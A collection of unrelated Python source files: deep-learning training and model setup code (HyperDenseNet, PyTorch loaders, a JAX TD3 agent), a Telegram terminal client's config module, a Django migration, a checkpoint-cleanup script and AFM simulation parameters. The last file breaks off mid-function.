print " - Layers: {}".format(myParserConfigIni.layers)
print " - Kernel sizes: {}".format(myParserConfigIni.kernels)
print " - Intermediate connected CNN layers: {}".format(myParserConfigIni.intermediate_ConnectedLayers)
print " - Pooling: {}".format(myParserConfigIni.pooling_scales)
print " - Dropout: {}".format(myParserConfigIni.dropout_Rates)
def Linear():
print " --- Activation function: Linear"
def ReLU():
print " --- Activation function: ReLU"
def PReLU():
print " --- Activation function: PReLU"
def LeakyReLU():
print " --- Activation function: Leaky ReLU"
printActivationFunction = {0 : Linear,
1 : ReLU,
2 : PReLU,
3 : LeakyReLU}
printActivationFunction[myParserConfigIni.activationType]()
def Random(layerType):
print " --- Weights initialization (" +layerType+ " Layers): Random"
def Delving(layerType):
print " --- Weights initialization (" +layerType+ " Layers): Delving"
def PreTrained(layerType):
print " --- Weights initialization (" +layerType+ " Layers): PreTrained"
printweight_Initialization_CNN = {0 : Random,
1 : Delving,
2 : PreTrained}
printweight_Initialization_CNN[myParserConfigIni.weight_Initialization_CNN]('CNN')
printweight_Initialization_CNN[myParserConfigIni.weight_Initialization_FCN]('FCN')
print " ------------------------ Training Parameters ------------------------ "
if len(myParserConfigIni.learning_rate) == 1:
print " - Learning rate: {}".format(myParserConfigIni.learning_rate)
else:
for i in xrange(len(myParserConfigIni.learning_rate)):
print " - Learning rate at layer {} : {} ".format(str(i+1),myParserConfigIni.learning_rate[i])
print " - Batch size: {}".format(myParserConfigIni.batch_size)
if myParserConfigIni.applyBatchNorm == True:
print " - Apply batch normalization in {} epochs".format(myParserConfigIni.BatchNormEpochs)
print " ------------------------ Size of samples ------------------------ "
print " - Training: {}".format(myParserConfigIni.sampleSize_Train)
print " - Testing: {}".format(myParserConfigIni.sampleSize_Test)
# --------------- Create my LiviaSemiDenseNet3D object ---------------
myHyperDenseNet3D = HyperDenseNet3D()
# --------------- Create the whole architecture (Conv layers + fully connected layers + classification layer) ---------------
myHyperDenseNet3D.createNetwork(myParserConfigIni.networkName,
myParserConfigIni.folderName,
myParserConfigIni.layers,
myParserConfigIni.kernels,
myParserConfigIni.intermediate_ConnectedLayers,
myParserConfigIni.n_classes,
myParserConfigIni.sampleSize_Train,
myParserConfigIni.sampleSize_Test,
myParserConfigIni.batch_size,
myParserConfigIni.applyBatchNorm,
myParserConfigIni.BatchNormEpochs,
myParserConfigIni.activationType,
myParserConfigIni.dropout_Rates,
myParserConfigIni.pooling_scales,
myParserConfigIni.weight_Initialization_CNN,
myParserConfigIni.weight_Initialization_FCN,
myParserConfigIni.weightsFolderName,
myParserConfigIni.weightsTrainedIdx,
myParserConfigIni.tempSoftMax
)
# TODO: Specify also the weights if pre-trained
# --------------- Initialize all the training parameters ---------------
myHyperDenseNet3D.initTrainingParameters(myParserConfigIni.costFunction,
myParserConfigIni.L1_reg_C,
myParserConfigIni.L2_reg_C,
myParserConfigIni.learning_rate,
myParserConfigIni.momentumType,
myParserConfigIni.momentumValue,
myParserConfigIni.momentumNormalized,
myParserConfigIni.optimizerType,
myParserConfigIni.rho_RMSProp,
myParserConfigIni.epsilon_RMSProp
)
# --------------- Compile the functions (Training/Validation/Testing) ---------------
myHyperDenseNet3D.compileTheanoFunctions()
# --------------- Save the model ---------------
# Generate folders to store the model
BASE_DIR = os.getcwd()
path_Temp = os.path.join(BASE_DIR,'outputFiles')
# For the networks
netFolderName = os.path.join(path_Temp,myParserConfigIni.folderName)
netFolderName = os.path.join(netFolderName,'Networks')
# For the predictions
predlFolderName = os.path.join(path_Temp,myParserConfigIni.folderName)
predlFolderName = os.path.join(predlFolderName,'Pred')
predValFolderName = os.path.join(predlFolderName,'Validation')
predTestFolderName = os.path.join(predlFolderName,'Testing')
makeFolder(netFolderName, "Networks")
makeFolder(predValFolderName, "to store predictions (Validation)")
makeFolder(predTestFolderName, "to store predictions (Testing)")
print('------- Saving model (Be patient :) ).... ------')
modelFileName = netFolderName + "/" + myParserConfigIni.networkName + "_Epoch0"
dump_model_to_gzip_file(myHyperDenseNet3D, modelFileName)
strFinal = " Network model saved in " + netFolderName + " as " + myParserConfigIni.networkName + "_Epoch0"
print strFinal
return modelFileName
|
"""
Every parameter (except for CONFIG_FILE) can be
overwritten by external config file
"""
import mailcap
import os
import platform
import runpy
from typing import Any, Dict, List, Optional, Tuple
_os_name = platform.system()
_linux = "Linux"
_global_mailcap = mailcap.getcaps()
CONFIG_DIR: str = os.path.expanduser("~/.config/arigram/")
CONFIG_FILE: str = os.path.join(CONFIG_DIR, "config.py")
FILES_DIR: str = os.path.expanduser("~/.cache/arigram/")
DRAFTS_FILE: str = os.path.join(FILES_DIR, "drafts.json")
MAILCAP_FILE: Optional[str] = None
LOG_LEVEL: str = "INFO"
LOG_PATH: str = os.path.expanduser("~/.local/share/arigram/")
API_ID: str = "559815"
API_HASH: str = "fd121358f59d764c57c55871aa0807ca"
PHONE: Optional[str] = None
ENC_KEY: str = ""
TDLIB_PATH: Optional[str] = None
TDLIB_VERBOSITY: int = 0
MAX_DOWNLOAD_SIZE: str = "10MB"
NOTIFY_FUNCTION: Optional[Any] = None
VIEW_TEXT_CMD: str = "less"
# for more info see https://trac.ffmpeg.org/wiki/Capture/ALSA
VOICE_RECORD_CMD: str = (
"ffmpeg -f alsa -i hw:0 -c:a libopus -b:a 32k {file_path}"
if _os_name == _linux
else "ffmpeg -f avfoundation -i ':0' -c:a libopus -b:a 32k {file_path}"
)
EDITOR: str = os.environ.get("EDITOR", "vim")
_, __MAILCAP_EDITOR = mailcap.findmatch(_global_mailcap, "text/markdown")
if __MAILCAP_EDITOR:
EDITOR = str(__MAILCAP_EDITOR["view"]).split(" ", 1)[0]
LONG_MSG_CMD: str = f"{EDITOR} '{{file_path}}'"
DEFAULT_OPEN: str = (
"xdg-open {file_path}" if _os_name == _linux else "open {file_path}"
)
CHAT_FLAGS: Dict[str, str] = {}
MSG_FLAGS: Dict[str, str] = {}
ICON_PATH: str = os.path.join(
os.path.dirname(__file__), "resources", "arigram.png"
)
URL_VIEW: Optional[str] = None
USERS_COLOURS: Tuple[int, ...] = tuple(range(2, 16))
KEEP_MEDIA: int = 7
FILE_PICKER_CMD: Optional[str] = None
DOWNLOAD_DIR: str = os.path.expanduser("~/Downloads/")
EXTRA_FILE_CHOOSER_PATHS: List[str] = ["..", "/", "~"]
CUSTOM_KEYBINDS: Dict[str, Dict[str, Any]] = {}
TRUNCATE_LIMIT: int = 15
EXTRA_TDLIB_HEADEARS: Dict[Any, Any] = {}
if os.path.isfile(CONFIG_FILE):
config_params = runpy.run_path(CONFIG_FILE) # type: ignore
for param, value in config_params.items():
if param.isupper():
globals()[param] = value
else:
os.makedirs(CONFIG_DIR, exist_ok=True)
if not PHONE:
print(
"Enter your phone number in international format, including country code (example: +5037754762346)"
)
PHONE = input("(phone) ")
if not PHONE.startswith("+"):
PHONE = "+" + PHONE
with open(CONFIG_FILE, "a") as f:
f.write(f'\nPHONE = "{PHONE}"\n')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2017-02-09 02:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dominion', '0006_auto_20170201_0444'),
]
operations = [
migrations.AddField(
model_name='tasksupporter',
name='additional_points',
field=models.PositiveSmallIntegerField(blank=0, default=0),
),
]
|
#!/usr/bin/env python3
'''Go through the files in the current directory and remove and caffemodel/solverstate
files where there is a higher iteration available'''
import glob,re,sys,collections,os
prefixes = sys.argv[1:]
if not prefixes:
prefixes = ['.']
for prefix in prefixes:
for suffix in ['caffemodel','solverstate']:
files = collections.defaultdict(list)
for fname in glob.glob('%s/*.%s'%(prefix,suffix)):
m = re.search('(.*)_iter_(\d+)\.%s'%suffix,fname)
if m:
prefix = m.group(1)
i = int(m.group(2))
files[prefix].append((i,fname))
for (k,files) in files.items():
toremove = sorted(files,reverse=True)[1:]
for (i,fname) in toremove:
print (fname)
os.remove(fname)
|
#!/usr/bin/python
import numpy as np
import os
import sys
# ====================== constants
eVA_Nm = 16.0217657
CoulombConst = -14.3996448915;
# default parameters of simulation
params={
'PBC': True,
'nPBC' : np.array( [ 1, 1, 1 ] ),
'gridN': np.array( [ -1, -1, -1 ] ).astype(np.int),
'gridA': np.array( [ 12.798, -7.3889, 0.00000 ] ),
'gridB': np.array( [ 12.798, 7.3889, 0.00000 ] ),
'gridC': np.array( [ 0, 0, 5.0 ] ),
'moleculeShift': np.array( [ 0.0, 0.0, 0.0 ] ),
'probeType': '8',
'charge': 0.00,
'useLJ':True,
'r0Probe' : np.array( [ 0.00, 0.00, 4.00] ),
'stiffness': np.array( [ 0.5, 0.5, 20.00] ),
'tip': 's',
'sigma':0.7,
'scanStep': np.array( [ 0.10, 0.10, 0.10 ] ),
'scanMin': np.array( [ 0.0, 0.0, 5.0 ] ),
'scanMax': np.array( [ 20.0, 20.0, 8.0 ] ),
'kCantilever' : 1800.0,
'f0Cantilever' : 30300.0,
'Amplitude' : 1.0,
'plotSliceFrom': 16,
'plotSliceTo' : 22,
'plotSliceBy' : 1,
'imageInterpolation': 'bicubic',
'colorscale' : 'gray',
'ddisp' : 0.05 ,
'tip_base': np.array( ['None', 0.00 ]) #.astype(np.string)
}
# ==============================
# ============================== Pure python functions
# ==============================
def Fz2df( F, dz=0.1, k0 = params['kCantilever'], f0=params['f0Cantilever'], n=4, units=16.0217656 ):
'''
conversion of vertical force Fz to frequency shift
according to:
Giessibl, F. J. A direct method to calculate tip-sample forces from frequency shifts in frequency-modulation atomic force microscopy Appl. Phys. Lett. 78, 123 (2001)
oscialltion amplitude of cantilever is A = n * dz
'''
x = np.linspace(-1,1,int(n+1) )
y = np.sqrt(1-x*x)
dy = ( y[1:] - y[:-1] )/(dz*n)
fpi = (n-2)**2; prefactor = ( 1 + fpi*(2/np.pi) ) / (fpi+1) # correction for small n
dFconv = -prefactor * np.apply_along_axis( lambda m: np.convolve(m, dy, mode='valid'), axis=0, arr=F )
return dFconv*units*f0/k0
# ==============================
# ============================== server interface file I/O
# ==============================
# overide default parameters by parameters read from a file
def loadParams( fname,FFparams=None ):
print(" >> OVERWRITING SETTINGS by "+fname)
fin = open(fname,'r')
for line in fin:
words=line.split()
if len(words)>=2:
key = words[0]
if key in params:
val = params[key]
print(key,' is class ', val.__class__)
if isinstance( val, bool ):
word=words[1].strip()
if (word[0]=="T") or (word[0]=="t"):
params[key] = True
else:
params[key] = False
print(key, params[key], ">>",word,"<<")
elif isinstance( val, float ):
params[key] = float( words[1] )
print(key, params[key], words[1])
elif isinstance( val, int ):
params[key] = int( words[1] )
print(key, params[key], words[1])
elif isinstance( val, str ):
params[key] = words[1]
print(key, params[key], words[1])
elif isinstance(val, np.ndarray ):
if val.dtype == np.float:
params[key] = np.array([ float(words[1]), float(words[2]), float(words[3]) ])
print(key, params[key], words[1], words[2], words[3])
elif val.dtype == np.int:
print(key)
params[key] = np.array([ int(words[1]), int(words[2]), int(words[3]) ])
print(key, params[key], words[1], words[2], words[3])
else: #val.dtype == np.str:
params[key] = np.array([ str(words[1]), float(words[2]) ])
print(key, params[key], words[1], words[2])
fin.close()
if (params["gridN"][0]<=0):
params["gridN"][0]=round(np.linalg.norm(params["gridA"])*10)
params["gridN"][1]=round(np.linalg.norm(params["gridB"])*10)
params["gridN"][2]=round(np.linalg.norm(params["gridC"])*10)
try:
params['probeType'] = int(params['probeType'])
except:
if FFparams is None:
raise ValueError("if the ProbeParticle type is defined as "
"string, you have to provide parameter FFparams to the "
"loadParams function")
elem_dict={}
for i,ff in enumerate(FFparams):
elem_dict[ff[3]] = i+1
try:
params['probeType']=elem_dict[params['probeType']]
except:
raise ValueError("The element {} for the ProbeParticle "
"was not found".format(params['probeType']))
params["tip"] = params["tip"].replace('"', ''); params["tip"] = params["tip"].replace("'", ''); ### necessary for working even with quotemarks in params.ini
params["tip_base"][0] = params["tip_base"][0].replace('"', ''); params["tip_base"][0] = params["tip_base"][0].replace("'", ''); ### necessary for working even with quotemarks in params.ini
# load atoms species parameters form a file ( currently used to load Lenard-Jones parameters )
def loadSpecies( fname ):
FFparams=np.genfromtxt(fname,dtype=[('rmin',np.float64),('epsilon',np.float64),
('atom',np.int),('symbol', '|S10')],
usecols=[0,1,2,3])
return FFparams
def autoGeom( Rs, shiftXY=False, fitCell=False, border=3.0 ):
'''
set Force-Filed and Scanning supercell to fit optimally given geometry
then shifts the geometry in the center of the supercell
'''
zmax=max(Rs[2]); Rs[2] -= zmax
print(" autoGeom substracted zmax = ",zmax)
xmin=min(Rs[0]); xmax=max(Rs[0])
ymin=min(Rs[1]); ymax=max(Rs[1])
if fitCell:
params[ 'gridA' ][0] = (xmax-xmin) + 2*border
params[ 'gridA' ][1] = 0
params[ 'gridB' ][0] = 0
params[ 'gridB' ][1] = (ymax-ymin) + 2*border
params[ 'scanMin' ][0] = 0
params[ 'scanMin' ][1] = 0
params[ 'scanMax' ][0] = params[ 'gridA' ][0]
params[ 'scanMax' ][1] = params[ 'gridB' ][1]
print(" autoGeom changed cell to = ", params[ 'scanMax' ])
if shiftXY:
dx = -0.5*(xmin+xmax) + 0.5*( params[ 'gridA' ][0] + params[ 'gridB' ][0] ); Rs[0] += dx
dy = -0.5*(ymin+ymax) + 0.5*( params[ 'gridA' ][1] + params[ 'gridB' ][1] ); Rs[1] += dy;
print(" autoGeom moved geometry by ",dx,dy)
def PBCAtoms( Zs, Rs, Qs, avec, bvec, na=None, nb=None ):
'''
multiply atoms of sample along supercell vectors
the multiplied sample geometry is used for evaluation of forcefield in Periodic-boundary-Conditions ( PBC )
'''
Zs_ = []
Rs_ = []
Qs_ = []
if na is None:
na=params['nPBC'][0]
if nb is None:
nb=params['nPBC'][1]
for i in range(-na,na+1):
for j in range(-nb,nb+1):
for iatom in range(len(Zs)):
x = Rs[iatom][0] + i*avec[0] + j*bvec[0]
y = Rs[iatom][1] + i*avec[1] + j*bvec[1]
#if (x>xmin) and (x<xmax) and (y>ymin) and (y<ymax):
Zs_.append( Zs[iatom] )
Rs_.append( (x,y,Rs[iatom][2]) )
Qs_.append( Qs[iatom] )
return np.array(Zs_).copy(), np.array(Rs_).copy(), np.array(Qs_).copy()
def get_C612( i, j, FFparams ):
'''
compute Lenard-Jones coefitioens C6 and C12 pair of atoms i,j
'''
# print i, j, FFparams[i], FFparams[j]
Rij = FFparams[i][0] + FFparams[j][0]
Eij = np.sqrt( FFparams[i][1] * FFparams[j][1] )
return 2*Eij*(Rij**6), Eij*(Rij**12)
def getAtomsLJ( iZprobe, iZs, FFparams ):
'''
compute Lenard-Jones coefitioens C6 and C12 for interaction between atoms in list "iZs" and probe-particle "iZprobe"
'''
n = len(iZs)
C6 = np.zeros(n)
C12 = np.zeros(n)
for i in range(n):
C6[i],C12[i] = get_C612( int(iZprobe)-1, iZs[i]-1, FFparams )
return C6,C12
# ============= Hi-Level Macros
def prepareScanGrids( ):
'''
Defines the grid over which the tip will scan, according to scanMin, scanMax, and scanStep.
The origin of the grid is going to be shifted (from scanMin) by the bond length between the "Probe Particle"
and the "Apex", so that while the point of reference on the tip used to interpret scanMin was the Apex,
the new point of reference used in the XSF output will be the Probe Particle.
'''
zTips = np.arange( params['scanMin'][2], params['scanMax'][2]+0.00001, params['scanStep'][2] )
xTips = np.arange( params['scanMin'][0], params['scanMax'][0]+0.00001, params['scanStep'][0] )
yTips = np.arange( params['scanMin'][1], params['scanMax'][1]+0.00001, params['scanStep'][1] )
extent=( xTips[0], xTips[-1], yTips[0], yTips[-1] )
lvecScan =np.array([
[(params['scanMin'] + params['r0Probe'])[0],
(params['scanMin'] + params['r0Probe'])[1],
(params['scanMin'] - params['r0Probe'])[2] ] ,
[ (params['scanMax']-params['scanMin'])[0],0.0,0.0],
[0.0, (params['scanMax']-params['scanMin'])[1],0.0 ],
[0.0,0.0,(params['scanMax']-params['scanMin'])[2] ]
]).copy()
return xTips,yTips,zTips,lvecScan
def lvec2params( lvec ):
params['gridA'] = lvec[ 1,: ].copy()
params['gridB'] = lvec[ 2,: ].copy()
params['gridC'] = lvec[ 3,: ].copy()
def params2lvec( ):
lvec = np.array([
[ 0.0, 0.0, 0.0 ],
params['gridA'],
params['gridB'],
params['gridC'],
]).copy
return lvec
|
import torch
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from .SegmentationDataset import *
def get_loader(img_dir, mask_dir, batch_size):
seg_dataset = SegmentationDataset(img_dir, mask_dir)
loader = torch.utils.data.DataLoader(seg_dataset,
batch_size=batch_size,
num_workers=1,
shuffle=True)
return loader
def get_test_loader(img_dir, batch_size):
dataset = datasets.ImageFolder(root=img_dir, transform=transforms.ToTensor())
loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=1,
shuffle=True
)
return loader
|
from typing import Dict, List
from .model import Model
class ModelManager:
def __init__(self) -> None:
self.models: Dict[str, Model] = {}
def add_model(self, name: str, model: Model):
self.models[name] = model
def remove_model(self, name: str):
del self.models[name]
def __get_table_name(self, table_obj: dict[str, str]) -> str:
try:
return table_obj['name']
except KeyError:
return table_obj['tablename']
async def create_all_tables(self, models_db: List = []):
if len(self.models) > 0:
for _, model in self.models.items():
await model.create()
models_db = list(
map(lambda model: self.__get_table_name(model), models_db))
for name, model in self.models.items():
if name not in models_db:
await model.associations()
else:
model.relationships()
else:
Exception(
"No models found: I created your models and put the " +
"model_manager attribute on them.")
async def drop_all_tables(self):
for _, model in self.models.items():
await model.drop_table(cascade=True)
|
# # coding=utf-8
# """
# test_auxiliary.py
#
# Test auxiliary functions.
# """
# import unittest
# import numpy as np
# import scipy.stats as sps
# from odefilters import auxiliary as aux
#
# np.random.seed(568)
#
#
#
# class TestGaussianPDF(unittest.TestCase):
# """
# Tests gaussian_pdf() function.
# Checks whether it complains about
# wrong inputs returns vectorised evaluations
# and compares output to scipy.stats.
# """
# def setUp(self):
# """
# Set up pointsets, means and covariances
# that 'would work'
# """
# self.ptset_univar = np.random.rand(10)
# self.mean_univar = np.random.rand()
# self.cov_univar = np.random.rand()
#
# self.ptset_multivar = np.random.rand(10, 2)
# self.mean_multivar = np.random.rand(2)
# self.cov_multivar = np.random.rand() * np.eye(2)
#
#
# def test_compare_with_scipystats_univar(self):
# """Check whether the output is the same as for scipy.stats"""
# scs_output = sps.norm.pdf(self.ptset_univar[0],
# self.mean_univar, np.sqrt(self.cov_univar))
# aux_output = aux.gaussian_pdf(self.ptset_univar,
# self.mean_univar, self.cov_univar)[0]
# self.assertAlmostEqual(aux_output, scs_output, places=15)
#
#
# def test_inconsistent_univar(self):
# """
# Make gaussian_pdf() complain about
# wrongly shaped inputs in UNIVARIATE setting.
# """
# self.check_proper_input_univar()
# self.check_only_ptset_proper_univar()
# self.check_only_mean_proper_univar()
# self.check_only_covar_proper_univar()
#
# def check_proper_input_univar(self):
# """
# Everything has the right shape---this should pass.
# """
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_univar)
#
# def check_only_ptset_proper_univar(self):
# """
# Only the pointset has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
#
# def check_only_mean_proper_univar(self):
# """
# Only the mean has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
#
# def check_only_covar_proper_univar(self):
# """
# Only the covariance has the right shape.
# Recycle 'proper' multivariate inputs as
# wrong univariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
#
#
# def test_compare_with_scipystats_multivar(self):
# """
# Check whether the output is the same as for scipy.stats.
# """
# scs_output = sps.multivariate_normal.pdf(self.ptset_multivar[0],
# self.mean_multivar, self.cov_multivar)
# aux_output = aux.gaussian_pdf(self.ptset_multivar,
# self.mean_multivar, self.cov_multivar)[0]
# self.assertAlmostEqual(aux_output, scs_output, places=15)
#
#
# def test_inconsistent_multivar(self):
# """
# Make gaussian_pdf() complain about
# wrongly shaped inputs in MULTIVARIATE setting.
# """
# self.check_proper_input_multivar()
# self.check_only_ptset_proper_multivar()
# self.check_only_mean_proper_multivar()
# self.check_only_covar_proper_multivar()
#
# def check_proper_input_multivar(self):
# """
# Everything has the right shape---this should pass.
# """
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_multivar)
#
# def check_only_ptset_proper_multivar(self):
# """
# Only the pointset has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_univar)
#
#
# def check_only_mean_proper_multivar(self):
# """
# Only the mean has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_multivar, self.cov_univar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_univar)
#
# def check_only_covar_proper_multivar(self):
# """
# Only the covar has the right shape.
# Recycle 'proper' univariate inputs as
# wrong multivariate inputs.
# """
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_multivar, self.mean_univar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_multivar, self.cov_multivar)
# with self.assertRaises(AssertionError):
# aux.gaussian_pdf(self.ptset_univar, self.mean_univar, self.cov_multivar)
|
# Copyright 2022 Nicolas Perrin-Gilbert.
#
# Licensed under the BSD 3-Clause License.
from abc import ABC
from typing import Any, Tuple, Sequence, Callable
import dataclasses
import flax
from flax import linen
import jax
import jax.numpy as jnp
import optax
from xpag.agents.agent import Agent
import os
import joblib
Params = Any
PRNGKey = jnp.ndarray
@dataclasses.dataclass
class FeedForwardModel:
init: Any
apply: Any
@flax.struct.dataclass
class TrainingState:
"""Contains training state for the learner."""
policy_optimizer_state: optax.OptState
policy_params: Params
target_policy_params: Params
q_optimizer_state: optax.OptState
q_params: Params
target_q_params: Params
key: PRNGKey
steps: jnp.ndarray
class TD3(Agent, ABC):
def __init__(
self,
observation_dim,
action_dim,
params=None,
):
"""
Jax implementation of TD3 (https://arxiv.org/abs/1802.09477).
This version assumes that the actions are between -1 and 1 (for all
dimensions).
"""
discount = 0.99 if "discount" not in params else params["discount"]
reward_scale = 1.0 if "reward_scale" not in params else params["reward_scale"]
policy_lr = 3e-4 if "policy_lr" not in params else params["policy_lr"]
critic_lr = 3e-4 if "critic_lr" not in params else params["critic_lr"]
soft_target_tau = (
0.005 if "soft_target_tau" not in params else params["soft_target_tau"]
)
self.backend = None if "backend" not in params else params["backend"]
class CustomMLP(linen.Module):
"""MLP module."""
layer_sizes: Sequence[int]
activation: Callable[[jnp.ndarray], jnp.ndarray] = linen.relu
kernel_init_hidden_layer: Callable[
..., Any
] = jax.nn.initializers.lecun_uniform()
kernel_init_last_layer: Callable[
..., Any
] = jax.nn.initializers.lecun_uniform()
bias_init_hidden_layer: Callable[
..., Any
] = jax.nn.initializers.lecun_uniform()
bias_init_last_layer: Callable[
..., Any
] = jax.nn.initializers.lecun_uniform()
activate_final: bool = False
bias: bool = True
@linen.compact
def __call__(self, data: jnp.ndarray):
hidden = data
for i, hidden_size in enumerate(self.layer_sizes):
hidden = linen.Dense(
hidden_size,
name=f"hidden_{i}",
kernel_init=self.kernel_init_hidden_layer
if (i != len(self.layer_sizes) - 1)
else self.kernel_init_last_layer,
bias_init=self.bias_init_hidden_layer
if (i != len(self.layer_sizes) - 1)
else self.bias_init_last_layer,
use_bias=self.bias,
)(hidden)
if i != len(self.layer_sizes) - 1 or self.activate_final:
hidden = self.activation(hidden)
return hidden
def kernel_init_hidden_layer(key_, shape, dtype=jnp.float_):
# len(shape) should be 2
dtype = jax.dtypes.canonicalize_dtype(dtype)
mval = 1.0 / jnp.sqrt(jnp.maximum(shape[0], shape[1]))
return jax.random.uniform(key_, shape, dtype, -mval, mval)
def bias_init_hidden_layer(key_, shape, dtype=jnp.float_):
return 0.1 * jnp.ones(shape, jax.dtypes.canonicalize_dtype(dtype))
def init_last_layer(key_, shape, dtype=jnp.float_):
dtype = jax.dtypes.canonicalize_dtype(dtype)
mval = 1e-3
return jax.random.uniform(key_, shape, dtype, -mval, mval)
def make_td3_networks(
param_size: int,
obs_size: int,
action_size: int,
hidden_layer_sizes: Tuple[int, ...] = (256, 256),
) -> Tuple[FeedForwardModel, FeedForwardModel]:
"""Creates a policy and value networks for TD3."""
policy_module = CustomMLP(
layer_sizes=hidden_layer_sizes + (param_size,),
activation=linen.relu,
kernel_init_hidden_layer=kernel_init_hidden_layer,
kernel_init_last_layer=init_last_layer,
bias_init_hidden_layer=bias_init_hidden_layer,
bias_init_last_layer=init_last_layer,
)
class QModule(linen.Module):
"""Q Module."""
n_critics: int = 2
@linen.compact
def __call__(self, obs: jnp.ndarray, actions: jnp.ndarray):
hidden = jnp.concatenate([obs, actions], axis=-1)
res = []
for _ in range(self.n_critics):
q = CustomMLP(
layer_sizes=hidden_layer_sizes + (1,),
activation=linen.relu,
kernel_init_hidden_layer=kernel_init_hidden_layer,
kernel_init_last_layer=init_last_layer,
bias_init_hidden_layer=bias_init_hidden_layer,
bias_init_last_layer=init_last_layer,
)(hidden)
res.append(q)
return jnp.concatenate(res, axis=-1)
q_module = QModule()
dummy_obs = jnp.zeros((1, obs_size))
dummy_action = jnp.zeros((1, action_size))
policy = FeedForwardModel(
init=lambda key_: policy_module.init(key_, dummy_obs),
apply=policy_module.apply,
)
value = FeedForwardModel(
init=lambda key_: q_module.init(key_, dummy_obs, dummy_action),
apply=q_module.apply,
)
return policy, value
self._config_string = str(list(locals().items())[1:])
super().__init__("TD3", observation_dim, action_dim, params)
self.discount = discount
self.reward_scale = reward_scale
self.soft_target_tau = soft_target_tau
if "seed" in self.params:
start_seed = self.params["seed"]
else:
start_seed = 42
self.key, local_key, key_models = jax.random.split(
jax.random.PRNGKey(start_seed), 3
)
self.policy_model, self.value_model = make_td3_networks(
action_dim, observation_dim, action_dim
)
self.policy_optimizer = optax.adam(learning_rate=1.0 * policy_lr)
self.q_optimizer = optax.adam(learning_rate=1.0 * critic_lr)
key_policy, key_q = jax.random.split(key_models)
self.policy_params = self.policy_model.init(key_policy)
self.policy_optimizer_state = self.policy_optimizer.init(self.policy_params)
self.q_params = self.value_model.init(key_q)
self.q_optimizer_state = self.q_optimizer.init(self.q_params)
def postprocess(x):
return jnp.tanh(x)
self.postprocess = postprocess
def actor_loss(
policy_params: Params, q_params: Params, observations
) -> jnp.ndarray:
p_actions = self.policy_model.apply(policy_params, observations)
p_actions = self.postprocess(p_actions)
q_action = self.value_model.apply(q_params, observations, p_actions)
min_q = jnp.min(q_action, axis=-1)
return -jnp.mean(min_q)
def critic_loss(
q_params: Params,
target_policy_params: Params,
target_q_params: Params,
observations,
actions,
new_observations,
rewards,
mask,
key_,
) -> jnp.ndarray:
next_pre_actions = self.policy_model.apply(
target_policy_params, new_observations
)
new_next_actions = self.postprocess(next_pre_actions)
policy_noise = 0.2
noise_clip = 0.5
new_next_actions = jnp.clip(
new_next_actions
+ jnp.clip(
policy_noise
* jax.random.normal(key_, shape=new_next_actions.shape),
-noise_clip,
noise_clip,
),
-1.0,
1.0,
)
q_old_action = self.value_model.apply(q_params, observations, actions)
next_q = self.value_model.apply(
target_q_params, new_observations, new_next_actions
)
next_v = jnp.min(next_q, axis=-1)
target_q = jax.lax.stop_gradient(
rewards * self.reward_scale
+ mask * discount * jnp.expand_dims(next_v, -1)
)
q_error = q_old_action - target_q
q_loss = 2.0 * jnp.mean(jnp.square(q_error))
return q_loss
self.critic_grad = jax.value_and_grad(critic_loss)
self.actor_grad = jax.value_and_grad(actor_loss)
def update_step(
state: TrainingState, observations, actions, rewards, new_observations, mask
) -> Tuple[TrainingState, dict]:
key, key_critic = jax.random.split(state.key, 2)
actor_l, actor_grads = self.actor_grad(
state.policy_params, state.target_q_params, observations
)
policy_params_update, policy_optimizer_state = self.policy_optimizer.update(
actor_grads, state.policy_optimizer_state
)
policy_params = optax.apply_updates(
state.policy_params, policy_params_update
)
critic_l, critic_grads = self.critic_grad(
state.q_params,
state.target_policy_params,
state.target_q_params,
observations,
actions,
new_observations,
rewards,
mask,
key_critic,
)
q_params_update, q_optimizer_state = self.q_optimizer.update(
critic_grads, state.q_optimizer_state
)
q_params = optax.apply_updates(state.q_params, q_params_update)
new_target_q_params = jax.tree_multimap(
lambda x, y: x * (1 - soft_target_tau) + y * soft_target_tau,
state.target_q_params,
q_params,
)
new_target_policy_params = jax.tree_multimap(
